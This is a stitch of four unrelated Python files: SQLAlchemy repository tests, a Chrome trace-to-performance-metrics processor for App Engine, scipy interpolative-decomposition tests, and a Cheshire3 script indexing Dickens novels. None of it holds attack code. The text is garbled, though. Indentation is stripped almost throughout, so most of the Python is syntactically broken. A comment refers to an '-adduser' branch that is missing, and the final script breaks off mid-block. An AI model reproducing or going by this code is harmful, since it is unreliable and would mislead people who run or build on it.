db.session.remove()
db.drop_all()
class TestAdminRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def repo(self):
return SqlalchemyAdminRepo()
@pytest.fixture
def admin1_data(self):
return {
'username': 'test',
'original_password': '123',
'updated_at': datetime.now()
}
@pytest.fixture
def admin2_data(self):
return {
'username': 'test2',
'original_password': '1234',
'updated_at': datetime.now()
}
def test_admin_persistence(self, table, repo, admin1_data):
repo.set(Admin(**admin1_data))
admin = repo.get()
assert admin.username == admin1_data['username']
assert admin.password != admin1_data['original_password']
def test_multiple_admin_persistence(self, table, repo, admin1_data,
admin2_data):
repo.set(Admin(**admin1_data))
repo.set(Admin(**admin2_data))
admin = repo.get()
assert admin.username == admin2_data['username']
assert admin.password != admin2_data['original_password']
def test_no_admin_create(self, table, repo):
with pytest.raises(NoAdministratorFound):
repo.get()
class TestHostRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def repo(self):
return SqlalchemyHostRepo()
@pytest.fixture
def host1_data(self):
return {'id': 'fake_id1', 'name': 'localhost', 'detail': 'this machine',
'address': '127.0.0.1'}
@pytest.fixture
def host2_data(self):
return {'id': 'fake_id2', 'name': 'server1',
'detail': 'remote machine 1',
'address': '8.8.8.8'}
def test_next_identity(self, repo):
new_id = repo.next_identity()
assert type(new_id) is str
next_new_id = repo.next_identity()
assert new_id != next_new_id
def test_save_one_host(self, table, repo, host1_data, host2_data):
host = Host(**host1_data)
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host_from_persistence = hosts_from_persistence[0]
for key in host1_data.keys():
assert getattr(host, key) == getattr(host_from_persistence, key)
def test_save_multiple_host(self, table, repo, host1_data,
host2_data):
hosts = [Host(**host1_data), Host(**host2_data)]
for host in hosts:
repo.save(host)
hosts_from_persistence = repo.all()
        assert len(hosts_from_persistence) == 2
for host, host_from_persistence in zip(hosts, hosts_from_persistence):
for key in host1_data.keys():
assert getattr(host, key) == getattr(host_from_persistence, key)
def test_save_modified_host(self, table, repo, host1_data, host2_data):
host = Host(**host1_data)
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host.name, host.detail, host.address = host2_data['name'], host2_data[
'detail'], host2_data['address']
repo.save(host)
hosts_from_persistence = repo.all()
assert len(hosts_from_persistence) == 1
host_from_persistence = hosts_from_persistence[0]
for key in host2_data.keys():
if key == 'id':
assert host1_data['id'] == host_from_persistence.id
else:
assert host2_data[key] == getattr(host_from_persistence, key)
def test_delete(self, table, repo, host1_data):
host = Host(**host1_data)
repo.save(host)
repo.delete(repo.all()[0].id)
assert len(repo.all()) == 0
def test_query_by_id(self, table, repo, host1_data):
host = Host(**host1_data)
repo.save(host)
saved_host = repo.host_of_id(host.id)
for key in host1_data.keys():
assert getattr(host, key) == getattr(saved_host, key)
class TestServiceRepoImpl(DbEnvironment):
@pytest.fixture(scope='class')
def host_repo(self):
return SqlalchemyHostRepo()
@pytest.fixture(scope='class')
def service_repo(self):
return SqlalchemyServiceRepo()
@pytest.fixture
def host_data(self):
return {'id': 'fake_id', 'name': 'localhost', 'detail': 'this machine',
'address': '127.0.0.1'}
@pytest.fixture
def service1_data(self):
return {'id': 'fake_id1', 'name': 'nginx', 'detail': 'nginx service',
'port': 80}
@pytest.fixture
def service2_data(self):
return {'id': 'fake_id2', 'name': 'postgres',
'detail': 'postgres database', 'port': 5432}
def test_next_identity(self, service_repo):
new_id = service_repo.next_identity()
assert type(new_id) is str
next_new_id = service_repo.next_identity()
assert new_id != next_new_id
def test_save_service(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
host_from_persistence = host_repo.all()[0]
service1 = Service(**service1_data)
service2 = Service(**service2_data)
service_repo.save(host_from_persistence.id, service1)
service_repo.save(host_from_persistence.id, service2)
host_from_persistence = host_repo.all()[0]
services_from_persistence = host_from_persistence.services
assert len(services_from_persistence) == 2
service1_from_persistence = services_from_persistence[0]
for key in service1_data.keys():
assert getattr(service1, key) == getattr(service1_from_persistence,
key)
service2_from_persistence = services_from_persistence[1]
        for key in service2_data.keys():
assert getattr(service2, key) == getattr(service2_from_persistence,
key)
def test_save_modified_service(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
host_from_persistence = host_repo.all()[0]
service = Service(**service1_data)
service_repo.save(host_from_persistence.id, service)
assert len(host_repo.all()[0].services) == 1
service.name, service.detail, service.port = service2_data['name'], \
service2_data['detail'], \
service2_data['port']
service_repo.save(host_from_persistence.id, service)
services_from_persistence = host_repo.all()[0].services
assert len(services_from_persistence) == 1
service_from_persistence = services_from_persistence[0]
for key in service2_data.keys():
if key == 'id':
assert service1_data['id'] == service_from_persistence.id
else:
assert service2_data[key] == getattr(service_from_persistence,
key)
def test_delete(self, table, host_repo, service_repo,
host_data, service1_data, service2_data):
host_repo.save(Host(**host_data))
service = Service(**service1_data)
service_repo.save(host_repo.all()[0].id, service)
service_id = host_repo.all()[0].services[0].id
service_repo.delete(service_id)
assert len(host_repo.all()[0].services) == 0
|
|
#!/usr/bin/env python
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import gzip
import os
import sys
import re
import json
from StringIO import StringIO
from datetime import datetime
from datetime import timedelta
from urlparse import urlparse
from dateutil.parser import parse as dateparse
from google.appengine.ext import ndb
from telemetry.timeline import model as model_module
from telemetry.timeline import trace_data as trace_data_module
from telemetry.timeline import event as trace_event
from models import Project
from models import Action
from models import ActionDetail
from models import ActionDetailExtended
from models import Log
class TraceProcessor():
__temp_actions = {}
__js_blame = {}
def log (self, project, trace_info, extended_info,
status, records_imported=0):
if (project == None):
return
log = Log(
parent=project.key,
filename=trace_info.filename,
date=datetime.today(),
status=status,
records_imported=records_imported
)
log.put()
def process (self, project, trace_string, trace_info, extended_info):
try:
if re.search('json$', trace_info.filename):
# Re-encode to ISO-8859-1
trace_string = trace_string.decode('UTF-8', 'ignore')
trace_string = trace_string.encode('ISO-8859-1', 'ignore')
trace_json = json.loads(trace_string)
elif re.search('json.gz$', trace_info.filename):
gzip_trace_string = gzip.GzipFile(
fileobj=StringIO(trace_string)
).read()
trace_json = json.loads(gzip_trace_string)
else:
self.log(project, trace_info, extended_info,
'Error reading file: neither .json nor .json.gz')
return
except Exception, e:
self.log(project, trace_info, extended_info,
'JSON parse error')
return
try:
parsed_data = trace_data_module.TraceData(trace_json)
model = model_module.TimelineModel(parsed_data)
processes = model.GetAllProcesses()
except Exception, e:
self.log(project, trace_info, extended_info,
'Error processing the file.')
return
summarizable = []
trace_json = None
# If there is a process to filter by, use that. Otherwise
# find all non-empty and non-tracing processes and append
# them to the list.
if (trace_info.process != None):
summarizable = [
x for x in processes
if x.labels == trace_info.process]
else:
for p in processes:
if (p.labels != None and
p.labels != 'chrome://tracing' and
p.labels != 'BackgroundPage'):
summarizable.append(p)
# There should only be one process to process...
if len(summarizable) == 0:
self.log(project, trace_info, extended_info, 'No process found')
elif len(summarizable) > 1:
self.log(project, trace_info, extended_info,
'Multiple tabs (trace process) found.')
else:
return self.analyze_trace_and_append_actions(
project,
trace_info,
summarizable.pop(),
model.bounds,
extended_info)
def analyze_trace_and_append_actions (self, project, trace_info, process,
bounds, extended_info):
threads = self.get_threads(process)
renderer_thread = self.get_thread_by_name(process, 'CrRendererMain')
time_ranges = self.get_time_ranges(renderer_thread)
labels = extended_info['labels']
secret = extended_info['secret']
status = ''
records_imported = []
if project == None:
status = "No project found with secret %s" % secret
return None
# If a single label is provided...
if (self.is_single_label(labels)):
labels = self.wrap_labels_in_list_if_needed(labels)
#...and the Action of that label is for a Load Action, the trace is
# considered to match entirely to the Action. If the Action is not a
# Load Action, then only the ranges will be matched.
if (self.label_is_for_load_action(project, labels)):
status = 'Single label (%s), label is for load action' % labels[0]
# Ignore time ranges and reset to the whole window
time_ranges = [trace_event.TimelineEvent(category='Load',
name=labels[0],
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If the Action of that label is not a Load Action, then look for
# time ranges of that label.
else:
status = 'Single label (%s), label is not for a Load Action' % labels[0]
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If multiple labels are provided and the trace contains ranges,
# those ranges will be mapped to existing Actions in the Project
# with those labels.
elif (self.is_multi_label(labels) and len(time_ranges) > 0):
status = 'Multiple labels, trace contains ranges'
records_imported = self.create_action_details_from_trace(project,
labels, time_ranges, threads, trace_info, extended_info)
# If multiple labels are provided and the trace does not contain ranges,
# no Actions will be findable, so the import will be a no-op.
elif (self.is_multi_label(labels) and len(time_ranges) == 0):
# If, however, only one of the labels provided is for a Load Action,
# then the trace will be assumed to match to that Action.
action = self.get_single_load_action_from_multi_label(project, labels)
# Only go ahead if we found a single Load Action
if (action != None):
status = ('Multiple labels, trace contains no ranges. '
'Single Load Action label found.')
# Ignore time ranges and reset to the whole window
time_ranges = [trace_event.TimelineEvent(category=action.name,
name=action.label,
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
[action.name], time_ranges, threads, trace_info, extended_info)
# If no labels are provided..
elif (len(labels) == 0):
# ...and no ranges exist, then a match will be assumed if and
# only if there is one Load Action in the Project.
if (len(time_ranges) == 0):
action = self.get_single_load_action_from_project(project)
if (action != None):
status = ('No labels, trace contains no ranges. '
'Single Load Action in project found.')
time_ranges = [trace_event.TimelineEvent(category=action.name,
name=action.label,
start=bounds.min,
duration=(bounds.max - bounds.min))]
records_imported = self.create_action_details_from_trace(project,
[action.name], time_ranges, threads, trace_info, extended_info)
else:
status = ('No labels, trace contains no ranges. '
'Zero or multiple Load Actions found.')
# If time ranges do exist, then Actions will be created for those time
# ranges as necessary during the import.
elif (len(time_ranges) > 0):
status = ('No labels, trace contains ranges. '
'Actions will be created on demand.')
records_imported = self.create_action_details_from_trace(project,
[], time_ranges, threads, trace_info, extended_info)
else:
status = 'Unknown import error.'
self.log(project, trace_info, extended_info, status, len(records_imported))
return records_imported
def get_threads (self, process):
return [
t for t in process.threads.values()
if (t.name == 'Compositor' or
t.name == 'CrRendererMain' or
re.match('CompositorTileWorker', t.name))
]
def get_thread_by_name (self, process, name):
threads = [
r for r in process.threads.values()
if r.name == name
]
if (len(threads) == 0):
return None
return threads[0]
def get_time_ranges (self, thread):
return [
y for y in thread.GetAllEvents()
if (y.category == 'blink.console' and
y.thread_start != None)
]
def get_label (self, labels):
if (type(labels) is list):
return labels[0]
elif (type(labels) is str or type(labels) is unicode):
return labels
def wrap_labels_in_list_if_needed (self, labels):
if type(labels) is list:
return labels
label_list = map(str, labels.split(','))
return map(str.strip, label_list)
def is_single_label (self, labels):
return (type(labels) is str or
type(labels) is unicode or
(type(labels) is list and len(labels) == 1))
def is_multi_label (self, labels):
return (type(labels) is list and len(labels) > 1)
def label_is_for_load_action (self, project, labels):
if not self.is_single_label(labels):
return False
label = self.get_label(labels)
action = Action.query(ancestor=project.key).filter(
Action.label==label).get()
return (action != None and action.type == 'Load')
def get_single_load_action_from_project (self, project):
# Check all Actions.
actions = Action.query(ancestor=project.key)
load_action = None
for action in actions:
if action.type == 'Load':
# If we've just hit the first Load Action, set it, otherwise
# unset it and break out of the loop.
if load_action == None:
load_action = action
else:
load_action = None
break
# Return either None or the only load action
return load_action
def get_single_load_action_from_multi_label (self, project, labels):
if not self.is_multi_label(labels):
return None
actions = Action.query(ancestor=project.key)
load_action = None
for action in actions:
# Skip over any Actions that aren't in the set of labels.
if action.name not in labels:
continue
if action.type == 'Load':
# If we've just hit the first Load Action, set it, otherwise
# unset it and break out of the loop.
if load_action == None:
load_action = action
else:
load_action = None
break
# Return either None or the only load action
return load_action
def get_action_from_label (self, label, create_action_if_needed, project):
action = Action.query(ancestor=project.key).filter(
Action.label==label).get()
if (action == None and create_action_if_needed):
# Create a temp store of actions created just for this run.
if label not in self.__temp_actions:
action = Action(parent=project.key,
name=label,
type='Response',
label=label,
x_axis=0,
y_axis=0,
y_axis_max='duration')
action.put()
self.__temp_actions[label] = action
else:
action = self.__temp_actions[label]
return action
def get_javascript_url_from_stack_info (self, slice):
url = None
if 'data' not in slice.args:
return url
if ('url' in slice.args['data'] and
slice.args['data']['url'] != '' and
re.search('^http', slice.args['data']['url'])):
url = slice.args['data']['url']
elif ('scriptName' in slice.args['data'] and
slice.args['data']['scriptName'] != '' and
re.search('^http', slice.args['data']['scriptName'])):
url = slice.args['data']['scriptName']
return url
def create_action_details_from_trace (self, project, labels, time_ranges,
threads, trace_info, extended_info):
if (type(labels) is not list):
return []
results = {}
first_paint_time = None
dom_content_loaded_time = None
load_time = None
create_action_if_needed = (len(labels) == 0)
to_save = []
def sum(l):
total = 0
for v in l:
total += v
return total
# Default the trace date to the time the blob was uploaded.
trace_date = trace_info.date
if ('datetime' in extended_info):
try:
# Get the date, parse it, and set back to UTC for AppEngine
trace_date = dateparse(extended_info['datetime'])
trace_date = trace_date.replace(tzinfo=None) + trace_date.utcoffset()
except Exception, e:
# Fail nicely
trace_date = trace_info.date
speed_index = -1
if ('speed-index' in extended_info):
try:
speed_index = int(extended_info['speed-index'])
except Exception, e:
# No need to worry. If we get a non-numeric speed index, ignore it.
speed_index = -1
# Step 1: go through all time ranges, and match to the correct Action.
for time_range in time_ranges:
name = time_range.name
# Try and find the action. If we're unsuccessful, bail out from this
# time range and move to the next one.
action = self.get_action_from_label(name,
create_action_if_needed, project)
if (action == None):
continue
result = {
'Duration': time_range.duration,
'Frames': 0,
'ParseHTML': [],
'JavaScript': [],
'Styles': [],
'UpdateLayerTree': [],
'Layout': [],
'Paint': [],
'Raster': [],
'Composite': []
}
result_extended_info = {
'JavaScript': {}
}
# If there's a commit ID in the post, add that as an extended item.
if 'commit' in extended_info:
result_extended_info['commit'] = {
"commit": extended_info['commit']
}
# Same goes for the WPT id.
if 'webpagetest-id' in extended_info:
result_extended_info['webpagetest-id'] = {
"webpagetest-id": extended_info['webpagetest-id']
}
# Step through each thread.
for t in threads:
# Start with the events for the thread.
for q in t.GetAllEvents():
# In the events there should be DOMContentLoaded etc.
if q.name == "MarkDOMContent" and dom_content_loaded_time == None:
dom_content_loaded_time = q.start
elif q.name == "MarkFirstPaint" and first_paint_time == None:
first_paint_time = q.start
elif q.name == "MarkLoad" and load_time == None:
load_time = q.start
# The compositor thread may have the frame info, so we'll use that.
elif (q.name == 'DrawFrame' and
q.start > time_range.start and
q.start <= time_range.start + time_range.duration):
result['Frames'] += 1
# Then jump to the slices.
for s in t.IterAllSlicesInRange(time_range.start,
time_range.start + time_range.duration):
# Get the thread duration if possible, and the duration if not.
duration = self.get_best_duration_for_slice(s)
# Same for the immediate children.
children_duration = self.get_immediate_child_slice_durations(s)
if s.name == 'ParseHTML':
result['ParseHTML'].append(duration)
elif (s.name == 'FunctionCall' or
s.name == 'EvaluateScript' or
s.name == 'MajorGC' or
s.name == 'MinorGC' or
s.name == 'GCEvent'):
result['JavaScript'].append(duration)
# If we have JS Stacks find out who the culprits are for the
# JavaScript that is running.
owner_domain = self.get_javascript_url_from_stack_info(s)
if owner_domain != None:
# Parse the domain
parsed_owner_domain = urlparse(owner_domain)
domain = parsed_owner_domain.netloc
if domain not in result_extended_info['JavaScript']:
result_extended_info['JavaScript'][domain] = 0
result_extended_info['JavaScript'][domain] += duration
elif (s.name == 'UpdateLayoutTree' or
s.name == 'RecalculateStyles' or
s.name == 'ParseAuthorStyleSheet'):
result['Styles'].append(duration)
elif s.name == 'UpdateLayerTree':
result['UpdateLayerTree'].append(duration)
elif s.name == 'Layout':
result['Layout'].append(duration)
elif (s.name == 'Paint'):
result['Paint'].append(duration)
elif (s.name == 'RasterTask' or
s.name == 'Rasterize'):
result['Raster'].append(duration)
elif (s.name == 'CompositeLayers'):
result['Composite'].append(duration)
# Step 2: Summarize
timeInSeconds = result['Duration'] / float(1000)
if (timeInSeconds == 0):
timeInSeconds = 1
fps = result['Frames'] / timeInSeconds
action_details_extended_info = []
for extended_type, entry in result_extended_info.iteritems():
for extended_name, extended_value in entry.iteritems():
action_detail_extended = ActionDetailExtended(
type=extended_type,
name=extended_name,
value=str(extended_value)
)
# Append it to the list of items that need to be referenced
# by the ActionDetail that's about to be created.
action_details_extended_info.append(action_detail_extended)
action_detail = ActionDetail(
parent=action.key,
duration=result['Duration'],
parse_html=sum(result['ParseHTML']),
javascript=sum(result['JavaScript']),
styles=sum(result['Styles']),
update_layer_tree=sum(result['UpdateLayerTree']),
layout=sum(result['Layout']),
paint=sum(result['Paint']),
raster=sum(result['Raster']),
composite=sum(result['Composite']),
frames_per_second=fps,
date=(trace_date + timedelta(0, 0, 0, time_range.start)),
first_paint_time=first_paint_time,
dom_content_loaded_time=dom_content_loaded_time,
load_time=load_time,
speed_index=speed_index
)
# If there's any extended info for this ActionDetail, append it now.
if (len(action_details_extended_info)):
action_detail.extended_info = action_details_extended_info
# Add this action to the list of things to be saved
to_save.append(action_detail)
# Step 3: Store the ActionDetails
if (len(to_save) > 0):
ndb.put_multi(to_save)
return to_save
def get_best_duration_for_slice (self, slice):
duration = 0
if (slice.thread_duration != None):
duration = slice.thread_duration
elif (slice.duration != None):
duration = slice.duration
return duration
def get_immediate_child_slice_durations (self, slice):
duration = 0
for s in slice.sub_slices:
if (s.thread_duration != None):
duration += s.thread_duration
elif (s.duration != None):
duration += s.duration
return duration
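# --- Usage sketch (added; not part of the original module) -------------------
# A minimal illustration of the pure label helpers above. The label values
# ('Load', 'Runtime') are hypothetical; the datastore-backed methods need an
# App Engine context and a parsed trace, so they are not exercised here.
if __name__ == '__main__':
    tp = TraceProcessor()
    assert tp.is_single_label('Load')
    assert tp.is_multi_label(['Load', 'Runtime'])
    # A comma-separated string is normalised into a stripped list of labels.
    assert tp.wrap_labels_in_list_if_needed('Load, Runtime') == ['Load', 'Runtime']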
|
|
#******************************************************************************
# Copyright (C) 2013 Kenneth L. Ho
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer. Redistributions in binary
# form must reproduce the above copyright notice, this list of conditions and
# the following disclaimer in the documentation and/or other materials
# provided with the distribution.
#
# None of the names of the copyright holders may be used to endorse or
# promote products derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#******************************************************************************
import scipy.linalg.interpolative as pymatrixid
import numpy as np
from scipy.linalg import hilbert, svdvals, norm
from scipy.sparse.linalg import aslinearoperator
from scipy.linalg.interpolative import interp_decomp
from numpy.testing import (assert_, assert_allclose, assert_equal,
assert_array_equal)
import pytest
from pytest import raises as assert_raises
import sys
_IS_32BIT = (sys.maxsize < 2**32)
@pytest.fixture()
def eps():
yield 1e-12
@pytest.fixture(params=[np.float64, np.complex128])
def A(request):
# construct Hilbert matrix
# set parameters
n = 300
yield hilbert(n).astype(request.param)
@pytest.fixture()
def L(A):
yield aslinearoperator(A)
@pytest.fixture()
def rank(A, eps):
S = np.linalg.svd(A, compute_uv=False)
try:
rank = np.nonzero(S < eps)[0][0]
except IndexError:
rank = A.shape[0]
return rank
class TestInterpolativeDecomposition:
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_real_id_fixed_precision(self, A, L, eps, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
# Test ID routines on a Hilbert matrix.
A_or_L = A if not lin_op else L
k, idx, proj = pymatrixid.interp_decomp(A_or_L, eps, rand=rand)
B = pymatrixid.reconstruct_matrix_from_id(A[:, idx[:k]], idx, proj)
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_real_id_fixed_rank(self, A, L, eps, rank, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
k = rank
A_or_L = A if not lin_op else L
idx, proj = pymatrixid.interp_decomp(A_or_L, k, rand=rand)
B = pymatrixid.reconstruct_matrix_from_id(A[:, idx[:k]], idx, proj)
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize("rand,lin_op", [(False, False)])
def test_real_id_skel_and_interp_matrices(
self, A, L, eps, rank, rand, lin_op):
k = rank
A_or_L = A if not lin_op else L
idx, proj = pymatrixid.interp_decomp(A_or_L, k, rand=rand)
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(B, A[:, idx[:k]], rtol=eps, atol=1e-08)
assert_allclose(B @ P, A, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
    def test_svd_fixed_precision(self, A, L, eps, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
A_or_L = A if not lin_op else L
U, S, V = pymatrixid.svd(A_or_L, eps, rand=rand)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
@pytest.mark.parametrize(
"rand,lin_op",
[(False, False), (True, False), (True, True)])
def test_svd_fixed_rank(self, A, L, eps, rank, rand, lin_op):
if _IS_32BIT and A.dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
k = rank
A_or_L = A if not lin_op else L
U, S, V = pymatrixid.svd(A_or_L, k, rand=rand)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
def test_id_to_svd(self, A, eps, rank):
k = rank
idx, proj = pymatrixid.interp_decomp(A, k, rand=False)
U, S, V = pymatrixid.id_to_svd(A[:, idx[:k]], idx, proj)
B = U * S @ V.T.conj()
assert_allclose(A, B, rtol=eps, atol=1e-08)
def test_estimate_spectral_norm(self, A):
s = svdvals(A)
norm_2_est = pymatrixid.estimate_spectral_norm(A)
assert_allclose(norm_2_est, s[0], rtol=1e-6, atol=1e-8)
def test_estimate_spectral_norm_diff(self, A):
B = A.copy()
B[:, 0] *= 1.2
s = svdvals(A - B)
norm_2_est = pymatrixid.estimate_spectral_norm_diff(A, B)
assert_allclose(norm_2_est, s[0], rtol=1e-6, atol=1e-8)
def test_rank_estimates_array(self, A):
B = np.array([[1, 1, 0], [0, 0, 1], [0, 0, 1]], dtype=A.dtype)
for M in [A, B]:
rank_tol = 1e-9
rank_np = np.linalg.matrix_rank(M, norm(M, 2) * rank_tol)
rank_est = pymatrixid.estimate_rank(M, rank_tol)
assert_(rank_est >= rank_np)
assert_(rank_est <= rank_np + 10)
def test_rank_estimates_lin_op(self, A):
B = np.array([[1, 1, 0], [0, 0, 1], [0, 0, 1]], dtype=A.dtype)
for M in [A, B]:
ML = aslinearoperator(M)
rank_tol = 1e-9
rank_np = np.linalg.matrix_rank(M, norm(M, 2) * rank_tol)
rank_est = pymatrixid.estimate_rank(ML, rank_tol)
assert_(rank_est >= rank_np - 4)
assert_(rank_est <= rank_np + 4)
def test_rand(self):
pymatrixid.seed('default')
assert_allclose(pymatrixid.rand(2), [0.8932059, 0.64500803],
rtol=1e-4, atol=1e-8)
pymatrixid.seed(1234)
x1 = pymatrixid.rand(2)
assert_allclose(x1, [0.7513823, 0.06861718], rtol=1e-4, atol=1e-8)
np.random.seed(1234)
pymatrixid.seed()
x2 = pymatrixid.rand(2)
np.random.seed(1234)
pymatrixid.seed(np.random.rand(55))
x3 = pymatrixid.rand(2)
assert_allclose(x1, x2)
assert_allclose(x1, x3)
def test_badcall(self):
A = hilbert(5).astype(np.float32)
with assert_raises(ValueError):
pymatrixid.interp_decomp(A, 1e-6, rand=False)
def test_rank_too_large(self):
# svd(array, k) should not segfault
a = np.ones((4, 3))
with assert_raises(ValueError):
pymatrixid.svd(a, 4)
def test_full_rank(self):
eps = 1.0e-12
# fixed precision
A = np.random.rand(16, 8)
k, idx, proj = pymatrixid.interp_decomp(A, eps)
assert_equal(k, A.shape[1])
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(A, B @ P)
# fixed rank
idx, proj = pymatrixid.interp_decomp(A, k)
P = pymatrixid.reconstruct_interp_matrix(idx, proj)
B = pymatrixid.reconstruct_skel_matrix(A, k, idx)
assert_allclose(A, B @ P)
@pytest.mark.parametrize("dtype", [np.float_, np.complex_])
@pytest.mark.parametrize("rand", [True, False])
@pytest.mark.parametrize("eps", [1, 0.1])
def test_bug_9793(self, dtype, rand, eps):
if _IS_32BIT and dtype == np.complex_ and rand:
pytest.xfail("bug in external fortran code")
A = np.array([[-1, -1, -1, 0, 0, 0],
[0, 0, 0, 1, 1, 1],
[1, 0, 0, 1, 0, 0],
[0, 1, 0, 0, 1, 0],
[0, 0, 1, 0, 0, 1]],
dtype=dtype, order="C")
B = A.copy()
interp_decomp(A.T, eps, rand=rand)
assert_array_equal(A, B)
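# --- Usage sketch (added; not part of the test suite) ------------------------
# Demonstrates the fixed-precision interpolative decomposition API exercised by
# the tests above: decompose a small Hilbert matrix, then rebuild it from the
# skeleton columns and the interpolation coefficients.
if __name__ == "__main__":
    A_demo = hilbert(8)
    k_demo, idx_demo, proj_demo = pymatrixid.interp_decomp(A_demo, 1e-10, rand=False)
    B_demo = pymatrixid.reconstruct_matrix_from_id(
        A_demo[:, idx_demo[:k_demo]], idx_demo, proj_demo)
    print("rank-%d reconstruction error: %.3e" % (k_demo, norm(A_demo - B_demo, 2)))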
|
|
#!/bin/env python
import getpass
import os
import sys
import traceback
from lxml import etree
from crypt import crypt
import cheshire3
from cheshire3.baseObjects import Session
from cheshire3.server import SimpleServer
from cheshire3.internal import cheshire3Root
from cheshire3.document import StringDocument
from settings.settings import DATA_DIRECTORY
try:
    assert DATA_DIRECTORY
except AssertionError:
    raise ImportError("You have not specified the project-wide settings. "
                      "Please do so in settings.py.")
print DATA_DIRECTORY
# Launch a Cheshire session
session = Session()
serverConfig = os.path.join(cheshire3Root, 'configs', 'serverConfig.xml')
serv = SimpleServer(session, serverConfig)
db = serv.get_object(session, 'db_dickens')
session.database = 'db_dickens'
qf = db.get_object(session, 'defaultQueryFactory')
df = db.get_object(session, 'SimpleDocumentFactory')
concStore = db.get_object(session, 'concordanceStore')
authStore = db.get_object(session, 'authStore')  # needed by the -adduser branch below
recStore = db.get_object(session, 'recordStore')
ampPreP = db.get_object(session, 'AmpPreParser')
xmlp = db.get_object(session, 'LxmlParser')
### index 19C material
if ('--ntc' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY + 'ntc_novels'
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
errorCount= 0
for i, d in enumerate(df, start=1):
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
genia = geniaTxr.process_record(session, rec)
session.logger.log_info(session,
'Record {0} created'.format(i)
)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
session.logger.log_info(session,
'Record {0} stored'.format(i)
)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
errorCount += 1
traceback.print_exc(file=sys.stdout)
session.logger.log_info(session,
'Finished with {0} errors'.format(errorCount)
)
recStore.commit_storing(session)
db.commit_indexing(session)
## index Dickens material
if ('--dickens' in sys.argv):
geniaTxr = db.get_object(session, 'corpusTransformer')
indexWF = db.get_object(session, 'indexWorkflow')
data = DATA_DIRECTORY + 'dickens_novels'
df.load(session, data)
recStore.begin_storing(session)
db.begin_indexing(session)
errorCount= 0
for i, d in enumerate(df, start=1):
doc = ampPreP.process_document(session, d)
try:
rec = xmlp.process_document(session, doc)
genia = geniaTxr.process_record(session, rec)
session.logger.log_info(session,
'Record {0} created'.format(i)
)
rec2 = xmlp.process_document(session, genia)
recStore.create_record(session, rec2)
session.logger.log_info(session,
'Record {0} stored'.format(i)
)
db.add_record(session, rec2)
indexWF.process(session, rec2)
except Exception as e:
session.logger.log_error(session, str(e))
errorCount += 1
traceback.print_exc(file=sys.stdout)
session.logger.log_info(session,
'Finished with {0} errors'.format(errorCount)
)
recStore.commit_storing(session)
db.commit_indexing(session)
if ('--addIndex' in sys.argv):
idx = db.get_object(session, 'idx-text-kwd-prox-unnrml')
recStore = db.get_object(session, 'recordStore')
